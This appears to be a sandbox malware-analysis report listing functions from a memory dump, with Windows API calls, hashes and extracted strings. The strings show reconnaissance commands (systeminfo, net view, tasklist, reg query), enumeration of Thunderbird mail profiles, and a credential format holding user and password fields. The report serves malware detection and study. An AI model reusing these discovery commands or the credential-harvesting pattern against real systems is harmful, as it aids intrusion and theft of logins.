HeapFree.KERNEL32(00000000,?), ref: 05407C49
HeapFree.KERNEL32(00000000,?), ref: 05407C59
RegCloseKey.ADVAPI32(?), ref: 05407C62

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: e36a8789f0ec83b0a09a2796d9d5753457dc88ff890e91895ae3e638b44fa1b5
Instruction ID: 606ac0c7222fae554c058189a9161a920c17144fc675c156386d341ff2d5ff3f
Opcode Fuzzy Hash: e36a8789f0ec83b0a09a2796d9d5753457dc88ff890e91895ae3e638b44fa1b5
Instruction Fuzzy Hash: 0E4114B1C0421DEFCF219F90CC848EEBF7AFB08354F60446AF500A2250DB355A95DB62

Uniqueness

Uniqueness Score: -1.00%

Function 05403FA2, Relevance: 12.1, APIs: 8, Instructions: 118memoryfilethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 05413F85: RtlEnterCriticalSection.NTDLL(05958D20), ref: 05413FB0
Part of subcall function 05413F85: RtlLeaveCriticalSection.NTDLL(05958D20), ref: 05413FCE
Part of subcall function 05413F85: HeapFree.KERNEL32(00000000,?,?,?,?,?,05403FAB,?), ref: 05414009

RtlExitUserThread.NTDLL(00000000,?), ref: 05403FB8

Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD5E
Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD77
Part of subcall function 0540DD4C: GetCurrentThreadId.KERNEL32 ref: 0540DD84
Part of subcall function 0540DD4C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD90
Part of subcall function 0540DD4C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD9E
Part of subcall function 0540DD4C: lstrcpy.KERNEL32(00000000), ref: 0540DDC0

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 05404005
StrTrimA.SHLWAPI(?,20000920), ref: 05404023
StrTrimA.SHLWAPI(?,0A0D0920,?,?,00000001), ref: 0540408C
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 054040AD
DeleteFileA.KERNEL32(?,00003219), ref: 054040CF
HeapFree.KERNEL32(00000000,?), ref: 054040DE
HeapFree.KERNEL32(00000000,?,00003219), ref: 054040F6

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$FileTemp$CriticalPathSectionThreadTimeTrim$CurrentDeleteEnterExitLeaveNameSystemUserlstrcpy
String ID:
API String ID: 1066431401-0
Opcode ID: bbc4f20bdd01d28c89c26309b62e0d72b1284433fadbc7b9c1fa7ede4961f0be
Instruction ID: 47ed47a4dc9835a7481fcc133a957f7c09f2db0fc045287a63dddf7fc5737ccc
Opcode Fuzzy Hash: bbc4f20bdd01d28c89c26309b62e0d72b1284433fadbc7b9c1fa7ede4961f0be
Instruction Fuzzy Hash: D741C331204324AFE720DB65DC09FEB7BA8FF44710F510469F608E6190DB75D906CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0541F5BA, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,?,?,?,?,?,?,05407A6B), ref: 0541F5D0
wsprintfA.USER32 ref: 0541F5F8
lstrlen.KERNEL32(?), ref: 0541F607

Part of subcall function 05408AC2: HeapFree.KERNEL32(00000000,00000000,05421258,00000000), ref: 05408ACE

wsprintfA.USER32 ref: 0541F647
wsprintfA.USER32 ref: 0541F67C
memcpy.NTDLL(00000000,?,?), ref: 0541F689
memcpy.NTDLL(00000008,054283F4,00000002,00000000,?,?), ref: 0541F69E
wsprintfA.USER32 ref: 0541F6C1

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 8799488531e228bda67cc64504286b064f8c29eefc4458e380262a1b63bfb970
Instruction ID: 6227a9436064dfab0871d353c63337870678db03681024c4984671fc5c574d74
Opcode Fuzzy Hash: 8799488531e228bda67cc64504286b064f8c29eefc4458e380262a1b63bfb970
Instruction Fuzzy Hash: E0416271A00119FFDB14DF98D885EEEB7FCEF44204B54406AF919D3211DB30EA1A8B64

Uniqueness

Uniqueness Score: -1.00%

Function 05401C1A, Relevance: 12.1, APIs: 8, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 05401C51
RtlAllocateHeap.NTDLL(00000000,?), ref: 05401C68
GetUserNameW.ADVAPI32(00000000,?), ref: 05401C75
HeapFree.KERNEL32(00000000,00000000), ref: 05401C9B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 05401CC2
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05401CD6
GetComputerNameW.KERNEL32(00000000,00000000), ref: 05401CE3
HeapFree.KERNEL32(00000000,00000000), ref: 05401D06

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 28ecebbf44c6e3bead17f0bba173afa61c78977eb0bdc29c62363b833a9ea8b3
Instruction ID: c9f18d04434b746d3ea4e1b00436a0f1f894fa01d3fa30d92d2ceeefd5875396
Opcode Fuzzy Hash: 28ecebbf44c6e3bead17f0bba173afa61c78977eb0bdc29c62363b833a9ea8b3
Instruction Fuzzy Hash: 2F314C71A14205AFDB24DFA5DD85AEEBBF9FB44310F61547AE405D3280DB30EA01CB14

Uniqueness

Uniqueness Score: -1.00%

Function 05419291, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD5E
Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD77
Part of subcall function 0540DD4C: GetCurrentThreadId.KERNEL32 ref: 0540DD84
Part of subcall function 0540DD4C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD90
Part of subcall function 0540DD4C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD9E
Part of subcall function 0540DD4C: lstrcpy.KERNEL32(00000000), ref: 0540DDC0

HeapFree.KERNEL32(00000000,00000000,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000,?,net view >,00000000), ref: 05419381

Strings

tasklist.exe /SVC >, xrefs: 05419319
net view >, xrefs: 054192ED
driverquery.exe >, xrefs: 0541932F
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >, xrefs: 05419345
wmic computersystem get domain |more , xrefs: 054192B4
systeminfo.exe >, xrefs: 054192D3
nslookup 127.0.0.1 >, xrefs: 05419303

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$CurrentFreeHeapNameSystemThreadlstrcpy
String ID: driverquery.exe >$net view >$nslookup 127.0.0.1 >$reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >$systeminfo.exe >$tasklist.exe /SVC >$wmic computersystem get domain |more
API String ID: 3485239229-3033342
Opcode ID: 6aca4154b62d016d86d30ce227884de5897943e778cc14ece5c50a0a3cb18b37
Instruction ID: e8b28f3e142f2be5b30534f66e8a6dbd3bb4efa8c4ce04e0e07f4567c768def2
Opcode Fuzzy Hash: 6aca4154b62d016d86d30ce227884de5897943e778cc14ece5c50a0a3cb18b37
Instruction Fuzzy Hash: AA21B833E095BB33873521674CADDEF5859A787E9434B03EBEE527B38489519C0141E5

Uniqueness

Uniqueness Score: -1.00%

Function 0541E9CA, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,054139F4,?,?,?,?), ref: 0541E9EE
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0541EA00
wcstombs.NTDLL ref: 0541EA0E
lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,054139F4,?,?,?), ref: 0541EA32
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0541EA47
mbstowcs.NTDLL ref: 0541EA54
HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,054139F4,?,?,?,?,?), ref: 0541EA66
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,054139F4,?,?,?,?,?), ref: 0541EA80

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: 659c3d003e8573db1c8696e621c444208262f4fa8fdedd33af7542dda5e5241f
Instruction ID: 39df42c6d525fcbfcc04f8817e76960c609a8766c8747e32daf9285d12f39a59
Opcode Fuzzy Hash: 659c3d003e8573db1c8696e621c444208262f4fa8fdedd33af7542dda5e5241f
Instruction Fuzzy Hash: E4213971910219FFDB249FA0EC09EDF7FB9FB45380F118066BA05A2150DB719921DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0541038C, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 05410398
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 054103B6
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 054103BE
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 054103DC
GetLastError.KERNEL32 ref: 054103F0
RegCloseKey.ADVAPI32(?), ref: 054103FB
CloseHandle.KERNEL32(00000000), ref: 05410402
GetLastError.KERNEL32 ref: 0541040A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: 3943d3f8d6c002639cd9edb11ca767dcaa569d84cbe2e6b370701b990e69c70e
Instruction ID: 1f5f27f635b2a1a733ebd2216f556e8aa11183e9138cbf36c57aa94830c40b07
Opcode Fuzzy Hash: 3943d3f8d6c002639cd9edb11ca767dcaa569d84cbe2e6b370701b990e69c70e
Instruction Fuzzy Hash: DA113979150219EFDB259F64DC4DEEA3F6AFB44351F408026FE0AC6241CF71C891DA66

Uniqueness

Uniqueness Score: -1.00%

Function 05409365, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 22c3bffab6001defaf83c9b8158daab0f1026069af4b5751828da4d5c8d5c57e
Instruction ID: cea1608213762af2204e7ea48fb474e41e4e0cf39f40363cca082d30db8ec022
Opcode Fuzzy Hash: 22c3bffab6001defaf83c9b8158daab0f1026069af4b5751828da4d5c8d5c57e
Instruction Fuzzy Hash: D4A11531D04219EFDF22AF95CC08AEEBBB6FF44304F24547AE911A22A1D7318A55EF10

Uniqueness

Uniqueness Score: -1.00%

Function 05419390, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,77A04620,?,00000001,00000001,?,0541EA2B,?,?,?,?,?,00000000), ref: 054193E9
lstrlen.KERNEL32(?,?,?,00000000,77A04620,?,00000001,00000001,?,0541EA2B,?,?,?,?,?,00000000), ref: 05419407
RtlAllocateHeap.NTDLL(00000000,75146985,?), ref: 05419430
memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,0541EA2B,?,?,?,?,?,00000000), ref: 05419447
HeapFree.KERNEL32(00000000,00000000), ref: 0541945A
memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,0541EA2B,?,?,?,?,?,00000000), ref: 05419469
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,77A04620,?,00000001,00000001,?,0541EA2B,?,?,?), ref: 054194CD

Part of subcall function 05415A40: RtlLeaveCriticalSection.NTDLL(?), ref: 05415ABD

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: 57c4121c11636d6fbb05ab7b5690c0f90c13975e9104ed05ddb2e9e9663b9397
Instruction ID: 8edb9c69358b7e02756c2d75cb55df90d7239eceab3a0f845a2a98313606dd18
Opcode Fuzzy Hash: 57c4121c11636d6fbb05ab7b5690c0f90c13975e9104ed05ddb2e9e9663b9397
Instruction Fuzzy Hash: 39419131A04228AFCB219FA5DC88ADE7BA5FF04380F0581AAFD05A6250D7709951EB98

Uniqueness

Uniqueness Score: -1.00%

Function 05416E7E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(?,00000000,00000000,054212E2,00000000,7519F5B0,0540CF17,61636F4C,00000001,?,?), ref: 05416E8E
StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,?,0540202D,?), ref: 05416E9F

Part of subcall function 0541A09C: lstrlen.KERNEL32(?,00000000,75146980,05401EA7,054151F8,?), ref: 0541A0A5
Part of subcall function 0541A09C: memcpy.NTDLL(00000000,?,00000000,?), ref: 0541A0C8
Part of subcall function 0541A09C: memset.NTDLL ref: 0541A0D7

ExitProcess.KERNEL32 ref: 05416FDC

Part of subcall function 054031B8: StrChrA.SHLWAPI(00000000,0540672C,7748D3B0,05958D54,00000000,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 054031DE
Part of subcall function 054031B8: StrTrimA.SHLWAPI(00000000,0542A4A4,00000000,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 054031FD
Part of subcall function 054031B8: StrChrA.SHLWAPI(00000000,0540672C,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 0540320E
Part of subcall function 054031B8: StrTrimA.SHLWAPI(00000001,0542A4A4,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 05403220

lstrcmp.KERNEL32(?,mail), ref: 05416EFC

Part of subcall function 05404CF1: FindFirstFileW.KERNEL32(?,?,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 05404D6F
Part of subcall function 05404CF1: lstrlenW.KERNEL32(?), ref: 05404D8B
Part of subcall function 05404CF1: lstrlenW.KERNEL32(?), ref: 05404DA3
Part of subcall function 05404CF1: lstrcpyW.KERNEL32(00000000,?), ref: 05404DBC
Part of subcall function 05404CF1: lstrcpyW.KERNEL32(00000002), ref: 05404DD1
Part of subcall function 05404CF1: FindNextFileW.KERNEL32(?,00000010), ref: 05404DF9
Part of subcall function 05404CF1: FindClose.KERNEL32(00000002), ref: 05404E07
Part of subcall function 05404CF1: FreeLibrary.KERNEL32(?), ref: 05404E19

Part of subcall function 05422B07: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05422B2A
Part of subcall function 05422B07: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,05416F3C,?), ref: 05422B6B

Strings

/C pause dll, xrefs: 05416EAD
mail, xrefs: 05416EF5

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Findlstrlen$FileFreeHeapTrimlstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcesslstrcmpmemcpymemset
String ID: /C pause dll$mail
API String ID: 3668845731-3657633402
Opcode ID: 72471a1ebfbc0f872c6c8c4a396f4246a8bae6f48c07e383b2e9066020e07955
Instruction ID: 9cd5cc471a40db2ece121682e0dbe1749a39e13133bb7db3b402f78b3a41e23a
Opcode Fuzzy Hash: 72471a1ebfbc0f872c6c8c4a396f4246a8bae6f48c07e383b2e9066020e07955
Instruction Fuzzy Hash: 1141A272618311AFD720EF71CC88DAFBBE9BB88240F55883EF959D2550DB31D9098B16

Uniqueness

Uniqueness Score: -1.00%

Function 05401389, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 054013AB
lstrlenW.KERNEL32(?), ref: 054013BC
lstrlenW.KERNEL32(?), ref: 054013CE
lstrlenW.KERNEL32(?), ref: 054013E0
lstrlenW.KERNEL32(?), ref: 054013F2
lstrlenW.KERNEL32(00000008), ref: 054013FE

Strings

type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s, xrefs: 05401481

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen
String ID: type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
API String ID: 1659193697-1056788794
Opcode ID: dccdc6c78587bb31dbc2bca1a03cfd4a413109bc73b45ba0e350be5d85390b04
Instruction ID: bdc28c78a6676018380a7dba6453d86007fbe84572aa2ce5f369effdb1c4a568
Opcode Fuzzy Hash: dccdc6c78587bb31dbc2bca1a03cfd4a413109bc73b45ba0e350be5d85390b04
Instruction Fuzzy Hash: 5E414F71E00209ABDB20DFA9CC84AAFB7FABF44304B24A87ED516E3651E770D904CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0540DA9C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0540DB1E
lstrcpy.KERNEL32(00000000,grabs=), ref: 0540DB30
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0540DB3D
lstrlen.KERNEL32(grabs=,?,?,?,?,?,00000000,00000000,?), ref: 0540DB4F
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0540DB80

Strings

grabs=, xrefs: 0540DB2A, 0540DB4A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID: grabs=
API String ID: 2734445380-3012740322
Opcode ID: ac346c48a67fe97282175a893094026d8581761b42c5a7204902043a17c461ec
Instruction ID: 9b1bfedec422b9e691b7eef898df6f4047b53a363acfe077a7f9cc9c75df8e1d
Opcode Fuzzy Hash: ac346c48a67fe97282175a893094026d8581761b42c5a7204902043a17c461ec
Instruction Fuzzy Hash: 37318031900218BFDB21DF95CC49EEF7F79FF44250F508165F90592240EB749915DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0541DFBB, Relevance: 10.6, APIs: 7, Instructions: 93fileCOMMON

Download Yara Rule

APIs

Part of subcall function 05421E05: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0541DFD3,?,?,00000000), ref: 05421E11
Part of subcall function 05421E05: _aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 05421E27
Part of subcall function 05421E05: _snwprintf.NTDLL ref: 05421E4C
Part of subcall function 05421E05: CreateFileMappingW.KERNEL32(000000FF,0542E0E4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 05421E68
Part of subcall function 05421E05: GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0541DFD3,?), ref: 05421E7A
Part of subcall function 05421E05: CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0541DFD3), ref: 05421EB2

UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,0540202D), ref: 0541DFF2
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,0540202D,?), ref: 0541DFFB
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0541E01B
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 0541E041
SetEvent.KERNEL32(?,?,?,?,?,?,?,0540202D,?), ref: 0541E07A
GetLastError.KERNEL32(054260F6,00000000,00000000,?,?,?,?,?,?,?,0540202D,?), ref: 0541E0A9
CloseHandle.KERNEL32(00000000,054260F6,00000000,00000000,?,?,?,?,?,?,?,0540202D,?), ref: 0541E0B9

Part of subcall function 0541EB66: lstrlenW.KERNEL32(00000000,00000000,00000000,75145520,?,?,0540346B,?), ref: 0541EB72
Part of subcall function 0541EB66: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,0540346B,?), ref: 0541EB9A
Part of subcall function 0541EB66: memset.NTDLL ref: 0541EBAC

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Wow64$CloseFileHandle$EnableErrorLastRedirectionTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 3181697882-0
Opcode ID: eae29103fa6c4bbe0a578fbd12f1fed52fa411f107c4df74827b4c752f02b308
Instruction ID: b159539b90cca6eb61b84724c1a677ba5aed7c9f3e855b32ee971709c1816568
Opcode Fuzzy Hash: eae29103fa6c4bbe0a578fbd12f1fed52fa411f107c4df74827b4c752f02b308
Instruction Fuzzy Hash: BD31C139A10234EBDB249BB1DD49BFE7FBDEB40324F500056EC41E3180DB309A51CA69

Uniqueness

Uniqueness Score: -1.00%

Function 05402661, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05404B43,054160B5,00000000,75145520,?,?,05404B43,00000126,00000000,-00000005,00000000), ref: 05402691
RtlAllocateHeap.NTDLL(00000000,00000000,054160B5), ref: 054026A7
memcpy.NTDLL(00000010,05404B43,00000000,?,?,05404B43,00000126,00000000), ref: 054026DD
memcpy.NTDLL(00000010,00000000,00000126,?,?,05404B43,00000126), ref: 054026F8
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 05402716
GetLastError.KERNEL32(?,?,05404B43,00000126), ref: 05402720
HeapFree.KERNEL32(00000000,00000000,?,?,05404B43,00000126), ref: 05402746

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID:
API String ID: 2237239663-0
Opcode ID: d38418a13debf4746745839477de9994ec3df4458396a34bfb967e1573b0567f
Instruction ID: b92af8f752a6e8172f125ab355e2ac81cedd51b965b84c159a078cbf0a12b3a2
Opcode Fuzzy Hash: d38418a13debf4746745839477de9994ec3df4458396a34bfb967e1573b0567f
Instruction Fuzzy Hash: 71319175904219EFDB208FA5D849AEB7FB9FB44354F10443AF906D3290E6709915CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05413DA0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 054210F6: RtlEnterCriticalSection.NTDLL(0542E288), ref: 054210FE
Part of subcall function 054210F6: RtlLeaveCriticalSection.NTDLL(0542E288), ref: 05421113
Part of subcall function 054210F6: InterlockedIncrement.KERNEL32(0000001C), ref: 0542112C

RtlAllocateHeap.NTDLL(00000000,?,Blocked), ref: 05413DD0
memcpy.NTDLL(00000000,?,?), ref: 05413DE1
lstrcmpi.KERNEL32(00000002,?), ref: 05413E27
memcpy.NTDLL(00000000,?,?), ref: 05413E3B
HeapFree.KERNEL32(00000000,00000000,Blocked), ref: 05413E7A

Strings

Blocked, xrefs: 05413DA9, 05413E5E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked
API String ID: 733514052-367579676
Opcode ID: f9256c37cdae3f820605162b21b3d7337365fbc84657247e3ee0f7290ae3a69e
Instruction ID: 7cff2813c34fe9d52db8365299b08ecd5c4b4364e6d51a44eb50c269bd19c8b8
Opcode Fuzzy Hash: f9256c37cdae3f820605162b21b3d7337365fbc84657247e3ee0f7290ae3a69e
Instruction Fuzzy Hash: FE219471A00224BBDB209FA59C8AAEF7F79FF04290F14446AFD05A3210DB758D45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 05408AD7, Relevance: 10.6, APIs: 7, Instructions: 82stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 05408AEF
lstrcmpiW.KERNEL32(00000000,0065002E), ref: 05408B26
lstrcmpiW.KERNEL32(?,0064002E), ref: 05408B3B
lstrlenW.KERNEL32(?), ref: 05408B42
CloseHandle.KERNEL32(?), ref: 05408B6A
DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 05408B96
RtlLeaveCriticalSection.NTDLL(00000000), ref: 05408BB3

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 1496873005-0
Opcode ID: 82383f2f383c5e3242948cebae42941744029ab3ada5977a493ac06dea456541
Instruction ID: a4ba46f09ca404973902279027a06c5e94521cd297ef8ae66bada1fc351b1222
Opcode Fuzzy Hash: 82383f2f383c5e3242948cebae42941744029ab3ada5977a493ac06dea456541
Instruction Fuzzy Hash: F42194B1610314AFDB20AF75CE89EEF7BBCFF44204B5410B9B906E2180DB30D9068B60

Uniqueness

Uniqueness Score: -1.00%

Function 05423AB7, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05412339,00000000,0542E280,0542E2A0,?,?,05412339,0541E426,0542E280), ref: 05423AC7
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05423ADD
lstrlen.KERNEL32(0541E426,?,?,05412339,0541E426,0542E280), ref: 05423AE5
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05423AF1
lstrcpy.KERNEL32(0542E280,05412339), ref: 05423B07
HeapFree.KERNEL32(00000000,00000000,?,?,05412339,0541E426,0542E280), ref: 05423B5B
HeapFree.KERNEL32(00000000,0542E280,?,?,05412339,0541E426,0542E280), ref: 05423B6A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: 256f68f9b40669e663b71d7847acdd60fa361205067129b6f9ec0cb1c9daac64
Instruction ID: 2dcbc2e9118d3439d938fc58e55f3ad1b604791044798ed521411caa8892f19f
Opcode Fuzzy Hash: 256f68f9b40669e663b71d7847acdd60fa361205067129b6f9ec0cb1c9daac64
Instruction Fuzzy Hash: 9A216A31508270BFEB324F24DC45FEABF7AFB46240F814099F54497241CB359802C764

Uniqueness

Uniqueness Score: -1.00%

Function 05409291, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 054092B1

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

wsprintfA.USER32 ref: 054092DB

Part of subcall function 0541F5BA: GetSystemTimeAsFileTime.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,?,?,?,?,?,?,05407A6B), ref: 0541F5D0
Part of subcall function 0541F5BA: wsprintfA.USER32 ref: 0541F5F8
Part of subcall function 0541F5BA: lstrlen.KERNEL32(?), ref: 0541F607
Part of subcall function 0541F5BA: wsprintfA.USER32 ref: 0541F647
Part of subcall function 0541F5BA: wsprintfA.USER32 ref: 0541F67C
Part of subcall function 0541F5BA: memcpy.NTDLL(00000000,?,?), ref: 0541F689
Part of subcall function 0541F5BA: memcpy.NTDLL(00000008,054283F4,00000002,00000000,?,?), ref: 0541F69E
Part of subcall function 0541F5BA: wsprintfA.USER32 ref: 0541F6C1

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 05409350

